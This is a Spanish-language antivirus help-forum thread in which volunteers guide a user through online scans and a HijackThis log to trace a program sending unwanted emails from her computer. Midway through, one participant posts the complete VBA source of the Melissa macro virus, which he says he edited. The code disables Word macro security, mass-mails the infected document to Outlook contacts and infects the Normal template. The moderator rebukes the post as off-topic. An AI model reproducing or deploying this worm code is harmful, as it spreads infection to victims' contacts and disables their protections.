Virus emails vacios

[Raquelilla]

Buenos días,

tengo un problema con un supuesto virus (realmente no sé si es un virus). el ordenador o virus me genera emails vacios que manda todos los días a determinados contactos de mi libreta, luego a mi bandeja de entrada me llegan informes de postmaster@mail.hotmail.com. con el siguiente asunto: Delivery Status Notification. no sé como puedo acabar con este envio masivo. gracias

[msc hotline sat]

Pues empiece por lanzar estos AVONLINE y nos comenta el resultado:



[url=https://www.eset.es/analisis-online/][b][color=Darknesred]AV ONLINE aconsejado[/color][/b][/url]





Código:



[url=https://www.pandasecurity.com/spain/homeusers/solutions/online-antivirus/][b][color=Darknesred]testeo ONLINE de virus en memoria[/color][/b][/url]







saludos



ms, 23-11-2007

[Stone_FREE_]

Haz probado cambiando la contraseña del hotmail?

También sería bueno que mandes un log del hijackthis para ver si hay algo raro en tu PC (antes de sacar un log del hijackthis debes haber cerrado todos los programas incluyendo los navegadores web y el msn)



PD:

msc no sabía esa de poder cambiarle el nombre de un ejecutable a un proceso que está en uso ... muy buen dato! :)

Yo manejo algo de C++ y Visual C++, voy a tratar de crear mis próximos antivirus en C++, aunque aun no se modificar claves del registro y menos detener un proceso en memoria. Ahora que salgo de vacaciones voy a tratar de aprender todo eso. Gracias! :wink:



Stone_FREE_

[msc hotline sat]

Simplemente arranca en modo seguro para pasar el HJT, pero normalmente en modo normal tambien nos vale.



Y sí, Stone_FREE_, son cosas que se van aprendiendo con la experiencia..., nadie nace enseñado :wink:



saludos



ms, 23-11-2007

[evangelion_01]

Asi es como se edita el registro:

If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then

CommandBars("Macro").Controls("Security...").Enabled = False

System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&

Else

p$ = "clone"



Te dejo el codigo fuente del virus melissa, editado por mi despues:



Private Sub AutoOpen()

On Error Resume Next

p$ = "clone"

If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then

CommandBars("Macro").Controls("Security...").Enabled = False

System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&

Else

p$ = "clone"

CommandBars("Tools").Controls("Macro").Enabled = False

Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)

End If

Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice

Set UngaDasOutlook = CreateObject("Outlook.Application")

Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")

If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then

If UngaDasOutlook = "Outlook" Then

DasMapiName.Logon "profile", "password"

For y = 1 To DasMapiName.AddressLists.Count

Set AddyBook = DasMapiName.AddressLists(y)

x = 1

Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)

For oo = 1 To AddyBook.AddressEntries.Count

Peep = AddyBook.AddressEntries(x)

BreakUmOffASlice.Recipients.Add Peep

x = x + 1

If x > 50 Then oo = AddyBook.AddressEntries.Count

Next oo

BreakUmOffASlice.Subject = "Es un mensaje importante de " & Application.UserName

BreakUmOffASlice.Body = "El documento que me pediste we ... no se lo enseñes a nadie ;-)"

BreakUmOffASlice.Attachments.Add ActiveDocument.FullName

BreakUmOffASlice.Send

Peep = ""

Next y

DasMapiName.Logoff

End If

p$ = "clone"

System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo"

End If

Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)

Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)

NTCL = NTI1.CodeModule.CountOfLines

ADCL = ADI1.CodeModule.CountOfLines

BGN = 2

If ADI1.Name <> "Melissa" Then

If ADCL > 0 Then _

ADI1.CodeModule.DeleteLines 1, ADCL

Set ToInfect = ADI1

ADI1.Name = "Melissa"

DoAD = True

End If

If NTI1.Name <> "Melissa" Then

If NTCL > 0 Then _

NTI1.CodeModule.DeleteLines 1, NTCL

Set ToInfect = NTI1

NTI1.Name = "Melissa"

DoNT = True

End If

If DoNT <> True And DoAD <> True Then GoTo CYA

If DoNT = True Then

Do While ADI1.CodeModule.Lines(1, 1) = ""

ADI1.CodeModule.DeleteLines 1

Loop

ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")

Do While ADI1.CodeModule.Lines(BGN, 1) <> ""

ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)

BGN = BGN + 1

Loop

End If

p$ = "clone"

If DoAD = True Then

Do While NTI1.CodeModule.Lines(1, 1) = ""

NTI1.CodeModule.DeleteLines 1

Loop

ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")

Do While NTI1.CodeModule.Lines(BGN, 1) <> ""

ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)

BGN = BGN + 1

Loop

End If

CYA:

If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then

ActiveDocument.SaveAs FileName:=ActiveDocument.FullName

ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then

ActiveDocument.Saved = True: End If

'WORD/Melissa written by Kwyjibo

'Clone written by Duke/SMF

'Works in both Word 2000 and Word 97

'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? Tu decides haha!

'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!

If Day(Now) = Minute(Now) Then Selection.TypeText "Al parecer el kipling se la pela por no dejarnos traer lap desde inicio de año. Game's over. I'm outta here."

End Sub

[msc hotline sat]

No sé a qué viene, evangelion_01, postear parte de la macro del melissa, cuando no tiene nada que ver con lo que nos ocupa..., ademas de ser un virus de macro del siglo pasado !



Aparte, en este foro facilitamos utilidades para usuario, y huimos de aconsejar a los usuarios actuar a otro nivel, asi que mira de no repetir "instrucciones" similares a las posteadas, gracias



saludos



ms, 24-11-2007

[evangelion_01]

oh, esque stone_free habia dicho esto:
[quote]Yo manejo algo de C++ y Visual C++, voy a tratar de crear mis próximos antivirus en C++, aunque aun no se modificar claves del registro y menos detener un proceso en memoria. Ahora que salgo de vacaciones voy a tratar de aprender todo eso. Gracias[/quote]
Por eso puse eso en donde se edita el registro, pero bueno no volvere a poer eso, si quieren editarlo y dejar solo lo importante, donde digo como se edita el registro, no habria problema

[msc hotline sat]

Vamos a ver, lo que indicas es parte del codigo en la macro de un fichero del word, y no viene al caso ni para acceder al registro ni para incluir en antivirus o utilidades que no sean para estos virus de macro.



Da igual lo que has posteado, pues el codigo del melisa está en internet, pero no viene al caso en este Tema.



saludos



ms, 24-11-2007

[Raquelilla]

hola, hola

no entiendo nada de lo q me ha contestado evangelion_01.... :?

con el nanoscan no he conseguido nada, me dice q está todo ok

me he cambiado de contraseña a ver que ocurre, mañana lo sabré pq manda un mail diario por las mañanas, así q hasta mañana no os puedo comentar

muchas gracias a todos

[msc hotline sat]

Sí, ha sido un parentesis para Stone_FREE_.



Pues si no has detectado nada, posteanos log del HJT y lo analizaremos:



[b]

[color=yellow]HJT : (HiJackThis)[/color][/b]



[i]¿Como utilizar el Hijackthis ?[/i]

Lo primero que debemos hacer es descargarlo en nuestro ordenador y ubicarlo en una carpeta propia C:\HijackThis\

Ejecútarlo y presionar el botón "[b]Do a system scan and save a logfile[/b]"; el programa realizará el escaneo e inmediatamente generará el Log, sólo te pedira el nombre del archivo y su ubicación, puedes simplemente guardarlo así como está.

Se abrirá el Bloc de Notas, copia todo el contenido y pégalo como respuesta de este Tema

· [url=http://www.zonavirus.com/descargas/trendmicro-hijackthis.asp][b]Descargar Hijackthis[/b][/url]



Tras analizarlo, informaremos



saludos



ms, 24-11-2007

[Raquelilla]

Logfile of Trend Micro HijackThis v2.0.2

Scan saved at 20:24:17, on 24/11/2007

Platform: Windows XP SP2 (WinNT 5.01.2600)

MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Boot mode: Safe mode



Running processes:

C:\WINDOWS\System32\smss.exe

C:\WINDOWS\SYSTEM32\winlogon.exe

C:\WINDOWS\system32\services.exe

C:\WINDOWS\system32\lsass.exe

C:\WINDOWS\system32\svchost.exe

C:\WINDOWS\system32\svchost.exe

C:\Archivos de programa\Spyware Doctor\svcntaux.exe

C:\Archivos de programa\Spyware Doctor\swdsvc.exe

C:\WINDOWS\Explorer.EXE

C:\HiJack\HijackThis.exe



R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://g.msn.es/0SEESES/SAOS01

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.terra.es/

R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Vínculos

O2 - BHO: Aplicación auxiliar de vínculos de Adobe PDF Reader - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Archivos de programa\Archivos comunes\Adobe\Acrobat\ActiveX\AcroIEHelper.dll

O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Archivos de programa\Java\jre1.5.0_11\bin\ssv.dll

O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)

O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Archivos de programa\Archivos comunes\Microsoft Shared\Windows Live\WindowsLiveLogin.dll

O2 - BHO: ST - {9394EDE7-C8B5-483E-8773-474BF36AF6E4} - C:\Archivos de programa\MSN Apps\ST\01.03.0000.1005\en-xu\stmain.dll

O2 - BHO: AcroIEToolbarHelper Class - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Archivos de programa\Adobe\Acrobat 6.0\Acrobat\AcroIEFavClient.dll

O2 - BHO: MSNToolBandBHO - {BDBD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - C:\Archivos de programa\MSN Apps\MSN Toolbar\01.02.5000.1021\es\msntb.dll

O3 - Toolbar: PDF de Adobe - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Archivos de programa\Adobe\Acrobat 6.0\Acrobat\AcroIEFavClient.dll

O3 - Toolbar: MSN - {BDAD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - C:\Archivos de programa\MSN Apps\MSN Toolbar\01.02.5000.1021\es\msntb.dll

O4 - HKLM\..\Run: [Google Desktop Search] "C:\Archivos de programa\Google\Google Desktop Search\GoogleDesktop.exe" /startup

O4 - HKLM\..\Run: [SDTray] "C:\Archivos de programa\Spyware Doctor\SDTrayApp.exe"

O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Archivos de programa\Adobe\Reader 8.0\Reader\Reader_sl.exe"

O4 - HKLM\..\Run: [KernelFaultCheck] %systemroot%\system32\dumprep 0 -k

O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe

O4 - HKCU\..\Run: [Reminder] C:\Archivos de programa\Microsoft Money\System\reminder.exe

O4 - HKCU\..\Run: [MsnMsgr] "C:\Archivos de programa\MSN Messenger\MsnMsgr.Exe" /background

O4 - HKCU\..\Run: [SpyBrowser] "C:\Archivos de programa\SpyBro\SpyBro.exe" /autostart

O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'Servicio de red')

O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'SYSTEM')

O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'Default user')

O4 - Global Startup: Acelerador de inicio de AutoCAD.lnk = C:\Archivos de programa\Archivos comunes\Autodesk Shared\acstart16.exe

O4 - Global Startup: Acrobat Assistant.lnk = C:\Archivos de programa\Adobe\Acrobat 6.0\Distillr\acrotray.exe

O4 - Global Startup: Avisos del Calendario de Microsoft Works.lnk = ?

O4 - Global Startup: Messenger Power Plus 8.1.lnk = C:\Archivos de programa\MSN Messenger\msnmsgr.exe

O4 - Global Startup: SpeedTouch 121g Wireless USB Monitor.lnk = C:\Archivos de programa\Thomson SpeedTouch\SpeedTouch 121g Wireless USB Monitor\st121g.exe

O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel present

O8 - Extra context menu item: Add to Windows &Live Favorites - http://favorites.live.com/quickadd.aspx

O8 - Extra context menu item: E&xportar a Microsoft Excel - res://C:\ARCHIV~1\MI1933~1\OFFICE11\EXCEL.EXE/3000

O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Archivos de programa\Java\jre1.5.0_11\bin\ssv.dll

O9 - Extra 'Tools' menuitem: Consola de Sun Java - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Archivos de programa\Java\jre1.5.0_11\bin\ssv.dll

O9 - Extra button: Referencia - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\ARCHIV~1\MI1933~1\OFFICE11\REFIEBAR.DLL

O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Archivos de programa\Messenger\msmsgs.exe

O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Archivos de programa\Messenger\msmsgs.exe

O16 - DPF: {2B323CD9-50E3-11D3-9466-00A0C9700498} - http://us.chat1.yimg.com/us.yimg.com/i/chat/applet/v45/yacscom.cab

O16 - DPF: {7B297BFD-85E4-4092-B2AF-16A91B2EA103} (WScanCtl Class) - http://www.ca.com/us/securityadvisor/virusinfo/webscan.cab

O20 - AppInit_DLLs: ?U?C C:\ARCHIV~1\Google\GOOGLE~3\GOEC62~1.DLL

O20 - Winlogon Notify: hgdda - C:\WINDOWS\System32\hgdda.dll (file missing)

O23 - Service: Autodesk Licensing Service - Autodesk, Inc. - C:\Archivos de programa\Archivos comunes\Autodesk Shared\Service\AdskScSrv.exe

O23 - Service: Automatic Update Service (Automatic Update) - Unknown owner - C:\WINDOWS\System32\wuapi.exe (file missing)

O23 - Service: Defragmentation Management Handler (FAT Defragmentation) - Unknown owner - C:\WINDOWS\System32\dfrgfat32.exe (file missing)

O23 - Service: Google Updater Service (gusvc) - Google - C:\Archivos de programa\Google\Common\Google Updater\GoogleUpdaterService.exe

O23 - Service: Spyware Doctor Auxiliary Service (sdAuxService) - PC Tools - C:\Archivos de programa\Spyware Doctor\svcntaux.exe

O23 - Service: Spyware Doctor Service (sdCoreService) - PC Tools - C:\Archivos de programa\Spyware Doctor\swdsvc.exe

O23 - Service: Symantec Core LC - Symantec Corporation - C:\Archivos de programa\Archivos comunes\Symantec Shared\CCPD-LC\symlcsvc.exe

O23 - Service: Windows Time Sync (wservtime) - Unknown owner - C:\WINDOWS\csrss.exe (file missing)



--

End of file - 6059 bytes

[msc hotline sat]

Pues has tenido y tienes estos restos, si es que solo son restos, pues por FILE MISSING se entienden no solo los ausentes sino tambien los ocultos, y si es el caso, sería la causa !



ELimina estas claves:



O4 - HKCU\..\Run: [SpyBrowser] "C:\Archivos de programa\SpyBro\SpyBro.exe" /autostart



O20 - Winlogon Notify: hgdda - C:\WINDOWS\System32\hgdda.dll (file missing)



O23 - Service: Automatic Update Service (Automatic Update) - Unknown owner - C:\WINDOWS\System32\wuapi.exe (file missing)





O23 - Service: Defragmentation Management Handler (FAT Defragmentation) - Unknown owner - C:\WINDOWS\System32\dfrgfat32.exe (file missing)



O23 - Service: Windows Time Sync (wservtime) - Unknown owner - C:\WINDOWS\csrss.exe (file missing)





->[b] Para ello recordar[/b]: https://foros.zonavirus.com/viewtopic.php?f=2&t=45334





y si tras ello vuelves a lanzar el HJT y aparece alguna de ellas, es señal de que tenias el servicio en uso, lo cual es señal de que aun existe el fichero, y primero se debe localizar y eliminar, para lo que puedes usar el KILLBOX:



http://www.zonavirus.com/datos/descargas/193/Pocket_KillBox.asp



saludos



ms, 24-11-2007

[Raquelilla]

Voy a intentarlo... jeje. Con paciencia....

Muchas gracias por todo!!

[msc hotline sat]

Cuentanos el resultado, gracias



y suerte !



saludos



ms, 24-11-2007

[Stone_FREE_]

Raquelilla has sacado el log del HijackThis con tu PC en modo a prueba de fallos? Es que quería ver si había algún proceso activo sospechoso :? Por ahí llegué a creer que alguien te había metido un troyano y les estaba mandando correos a algunas personas de tu lista de contactos, y algunos de esos correos rebotaban. Te lo digo porque he tenido experiencias muy cercanas con un caso parecido.



Y es que a una amiga le habían metido un troyano indetectable, y éste se inyecta en el proceso iexplore.exe, y cuando sacas un log del HijackThis puedes apreciar que hay un proceso iexplore.exe activo, a pesar que tienes el internet explorer cerrado :shock:. Y lo malo es que éste troyano se inicializa por el método del activeX, y los logs del HijackThis no revizan esa zona. Entonces no podía averiguar en que lugar estaba ubicado ese virus, porque el proceso iexplore me ocultaba la ruta del ejecutable, y el HijackThis no me mostraba nada raro. Así que no podía eliminar éste troyano sin ir físicamente a su PC y me ponga a revisar algún proceso raro que haya en la zona ActiveX del registro.



Y evangelion_01 gracias por el código, pero me parece que está en Visual Basic, y es que no conozco mucho éste lenguaje (es muy Basic :lol: ) yo lo que conozco es C++, Visual C++, assembler y batch



saludos

Stone_FREE_

[evangelion_01]

Esque ha corrido el hijack en modo a prueba de fallos, pero no con las opciones de red activadas por lo que no tiene internet, raquelilla, si pudieras pasar tambien un hijack en modo normal estaria bien, para ver que esta activo normalmente.



Parentesis para stone_free, si el codigo esta en visual basic. yo por el momento solo se de eso

[msc hotline sat]

Pues a Stone_FREE_ te iría bien aprender Visual Basic, y a evangelion_01 un poco de C++ :wink: y dejando estar el parentesis y centrandonos en este Tema,



Y sí, lo ha posteado arrancando en modo seguro:



Boot mode: Safe mode



Si bien ello es preferible, pues asi se eluden RootKits que ocultan claves y procesos y focheros, y lo que dices de los ActiveX, creo que se cargan desde O4-RUN y O16-DPF o en O20, O21, O23, pero no siempre con ficheros visibles, por lo que el HJT indica FILE MISSING, en cuyo caso no quiere decir que no haya el fichero, sino que no lo ve el HJT, por no precisarse la ruta, por estar oculto, o por haber RootKit que lo oculta, pero la cuestión está en que si dicha clave no se deja eliminar (si es que es preciso, no es cuestion de eliminar los FILE MISSING buenos!), es que está en uso, por tanto existe dicho fichero...



Arranque en MODO NORMAL, pero sin acceder a Internet ni haber accedido al I.E. desde el arranque, posteenos log del HJT, a ver si vemos el iexplore activo y en tal caso obraremos en consecuencia



Y de paso asi tambien veremos si persiste alguna de las claves FILE MISSING que es donde yo pienso que tenemos el marrano, oculto pero existente, y cargandolo en algunas de dichas claves, lo pone en uso en cada arrancada.





saludos



ms, 25-11-2007





[u]NOTA:[/u]



Especialmente mira si encuentras oculto este C:\WINDOWS\System32\wuapi.exe que se lanza en esta clave:



O23 - Service: Automatic Update Service (Automatic Update) - Unknown owner - C:\WINDOWS\System32\wuapi.exe (file missing)



para lo cual configura el ver los ocultos:



https://foros.zonavirus.com/viewtopic.php?f=5&t=13245



y si está, envianos dicho fichero para analizarlo y controlarlo en proximas versiones:



->[b] Para ello recordar[/b]: https://foros.zonavirus.com/viewtopic.php?f=2&t=45334



ms.

[Raquelilla]

Hola,

Creo q tengo el problema en el ordenador del trabajo, así q aqui estoy.

Acabo de arrancar el nanoscan y me dice q tengo 2 troyanos.

A ver con el totalscan que tal y despues sacaré el log del HijackThis en este ordenador y os lo paso,a lo mejor aqui veis algo peor...

muchas gracias

[msc hotline sat]

En cvualquier caso, antes de eliminarlo, nos interesa que consigas enviarnos este fichero:



C:\WINDOWS\System32\wuapi.exe



->[b] Para ello recordar[/b]: https://foros.zonavirus.com/viewtopic.php?f=2&t=45334





y tras analizarlo , implementaremos su control y eliminacion en nuestras utilidades



saludos



ms, 25-11-2007

[Stone_FREE_]

msc, con respecto a las entradas ActiveX, he probado un troyano que se inicializa por éste método, y sacando un log del HijackThis antes y después de ejecutar el troyano, no hay diferencias en los logs.... solo aparece el proceso iexplore.exe . Y cuando examino la clave que éste troyano crea en el registro, dice "C:\WINDOWS\system32:server.exe". Entro a system32 a buscar el archivo server.exe y no aparece por ningún lado. Y es que quería hacerle el truco de cambiarle la extensión a .vir para dejarlo inutilizable :wink:. Aun habiendo marcado las opciones para ver archivos ocultos y del sistema no se puede ubicar ese archivo.



Sobre los rootkits me has hecho recordar que hace algunos años probando unos rootkits en una PC viejita que usaba para pruebas, ejecuté el rootkit en la unidad C:\. Y cuando quería acceder a la unidad C:, no aparecía nada :? No podía ver ningún archivo. Y luego le pasé el rootkit al escritorio, y desaparecieron todos los íconos del escritorio, hasta la barra de tareas :? . Le pasé el antivirus para eliminarlo y cuando empezaba a revisar la unidad C:, el antivirus se colgaba y se cerraba. Me daba pereza tener que formatear nuevamente en menos de una semana a pesar que uso el instalador de windows XP desatendido. Tuve que sacar el disco duro y ponerlo en otra PC para eliminarlo con el antivirus. No sabía que iniciando en modo a prueba de fallos podría haberlo eliminado. Que bueno que ahora existen las máquinas virtuales :wink:

[msc hotline sat]

Bueno, no siempre los Roootkits de evitan arrancando en modo seguro, los hay que se cargan como servicios aun arrancando en tal modo



Y segun el RootKit que sea, se oculta incluso la de él, o solo otras claves, como los procesos y ficheros que quiera, asi que probablemente este server.exe que dices estaba afectado por uno de ellos, y aun estando no se veia, ni fichero, ni claves ni procesos



Entonces no vale el HJT ni arrancando en modo normal, pues no vés el proceso, y arrancando en modo seguro ves la clave, a veces y si se deja ! :wink:



A ver si nos llega el fichero Wuapi.exe y al analizarlo lo vemos.



Por cierto, que actualmente está muy de moda el Bagle, con nuevas variantes a diario, y que ademas de usar Rootkit, modifica la clave de registro SAFEBOOT que impide arrancar en modo seguro, con lo cual se protege aun mas.



saludos



ms, 26-11-2007